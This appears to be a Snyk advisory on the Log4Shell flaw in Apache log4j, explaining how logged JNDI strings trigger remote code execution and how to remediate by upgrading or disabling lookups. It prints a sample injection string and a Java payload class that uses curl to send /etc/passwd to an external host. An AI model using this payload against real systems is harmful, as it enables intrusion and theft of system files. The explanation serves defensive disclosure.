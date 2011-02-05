Log4Shell vulnerability disclosed: Prevent Log4j RCE by updating to version 2.15.0

December 2021 by Brian Vermeer,Snyk

(Dec.10, 2021), a new, critical Log4j vulnerability was disclosed: Log4Shell. This vulnerability within the popular Java logging framework was published as CVE-2021-44228, categorized as Critical with a CVSS score of 10 (the highest score possible). The vulnerability was discovered by Chen Zhaojun from Alibaba’s Cloud Security team.

All current versions of log4j2 up to 2.14.1 are vulnerable. You can remediate this vulnerability by updating to version 2.15.0 or later.

Many application frameworks in the Java ecosystem use this logging framework by default. For instance, Apache Struts 2, Apache Solr, and Apache Druid are all affected. Aside from those, Apache log4j is also used in many Spring and Spring Boot applications, so we suggest you check your applications and update them to the latest version.

How bad is Log4Shell?

The simple answer is “very bad”! The vulnerability was first spotted in Minecraft. Microsoft rolled out an emergency patch to fix this problem quickly. TechCrunch reports that Apple, Amazon, Twitter, and Cloudflare are vulnerable to the Log4Shell attack. Per TechCrunch, “The Computer Emergency Response Team (CERT) for New Zealand, Deutsche Telekom’s CERT, and the Greynoise web monitoring service have all warned that attackers are actively looking for servers vulnerable to Log4Shell attacks. According to the latter, around 100 distinct hosts are scanning the internet for ways to exploit Log4j vulnerability.” Explaining the Log4Shell vulnerability

When using a vulnerable version of log4j, any incoming data that gets logged can lead to an RCE (remote code execution). When using JNDI (Java Naming and Directory Interface) to connect for instance to an LDAP URL and log it (shown below), it is possible to return a malicious payload with a code injection.

In the code snippet below, check out the argument that was given by a user. If the argument doesn’t comply, we log an error. But if the user input is "$jndi:ldap://someurl/Evil” we triggered the Log4Shell vulnerability because we know it will be logged as an error.

try

checkout(arg);

catch (Exception e)

logger.error("Failed to checkout with arg " + arg)



If you know that input is getting logged with log4j, you can set up an LDAP server and return a compiled class file that executes some code. An example of such a class can be seen below. This object sends my /etc/passwđ file to an external URL using curl. Note that this user input can be hidden in for instance the header of an HTTP call. When the logger evaluates the string, the call to the malicious LDAP server will take place.

public class RefactoredName implements ObjectFactory

@Override

public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable <?, ?> environment) throws Exception

Runtime.getRuntime().exec("curl -F ’file=@/etc/passw‍đ’ https://someurl/upload");

return null;





According to article by Luncasec about this issue, this impact all Java versions. JDK version greater than 6u211, 7u201, 8u191, and 11.0.1 do not seem to be affected by this LDAP attack. This is because these versions set com.sun.jndi.ldap.object.trustURLCodebase to false by default.

The exploit shown above was tested with JDK 8u111 and it worked. However doing the same with 8u292 did not work. Still, we are uncertain if newer Java versions provide protection against other possible variants of this attack. Remediating the Log4Shell vulnerability

The easiest way to remediate this is to update to log4j version 2.15.0 or later, as this behavior is now disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting the system property log4j2.formatMsgNoLookups to true by adding the following Java parameter: -Dlog4j2.formatMsgNoLookups=true

Alternatively, you can mitigate this vulnerability by removing the JndiLookup class from the classpath.* Scanning and updating to prevent vulnerabilities

This log4j RCE once again shows that scanning your applications for vulnerabilities is important, and something that you should do often. In addition, it is important to update your Java distribution to the most recent release to benefit from the newer security updates.

Scanning your application with Snyk Open Source will show you vulnerabilities in your open source libraries, including this issue with log4j. The example below shows the output from my IntelliJ IDEA plugin mentioning this issue and the remediation advice.